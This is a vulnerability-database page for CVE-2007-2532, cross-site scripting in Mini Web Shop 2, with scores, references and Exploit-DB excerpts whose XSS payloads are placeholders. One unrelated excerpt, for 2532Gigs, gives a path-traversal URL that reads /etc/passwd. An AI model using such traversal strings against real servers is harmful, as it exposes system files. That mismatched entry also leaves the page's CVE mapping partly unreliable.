CVE-2007-2532
Published 2007-05-09
Priority P4 · 18 · medium · 4.3 CVSS 2.0
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 3.72% (88.4th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in Minh Nguyen Duong Obie Website Mini Web Shop 2 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) to (1) sendmail.php or (2) order_form.php, different vectors than CVE-2006-6734.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| obie_website | mini_web_shop | — | — |
No detection rules found.
Exploit-DB
2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion
exploitdb · 2007-08-26 · CVE-2007-4585
---
-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°
2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability
Discovered by bd0rk || SOH-Crew
www.soh-crew.it.tt
The German Coding and IT-Security Resource
-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°
Vendor: http://www.2532gigs.com
Download: http://belnet.dl.sourceforge.net/sourceforge/gigs-2532/2532Gigs_1.2.1_stable.zip
License: Free
Vulnerable Code: include_once("languages/$language/settings.php");
Exploit: http://[h0sT]/[dir]/activateuser.php?language=../../../../../../../../etc/passwd%00
Greetings: str0ke, TheJT, GolD_M, die steffi, khaliDb, x0r_32
####The 18 years old, german Hacker bd0rk####
Exploit-DB
ObieWebsite Mini Web Shop 2 - 'Sendmail.php?PATH_INFO' Cross-Site Scripting
exploitdb · 2007-05-02 · CVE-2007-2532
---
source: https://www.securityfocus.com/bid/23847/info
Mini Web Shop is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
This issue affects Mini Web Shop 2; other versions may also be affected.
http://remote-server/path/modules/sendmail.php/[xss]
Exploit-DB
ObieWebsite Mini Web Shop 2 - 'order_form.php?PATH_INFO' Cross-Site Scripting
exploitdb · 2007-05-02 · CVE-2007-2532
---
source: https://www.securityfocus.com/bid/23847/info
Mini Web Shop is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
This issue affects Mini Web Shop 2; other versions may also be affected.
http://remote-server/path/modules/order_form.php/[xss]
No writeups or analysis indexed.
References
http://osvdb.org/36248
http://osvdb.org/36249
http://securityreason.com/securityalert/2666
http://www.securityfocus.com/archive/1/467831/100/0/threaded
http://www.securityfocus.com/bid/23847
https://exchange.xforce.ibmcloud.com/vulnerabilities/34105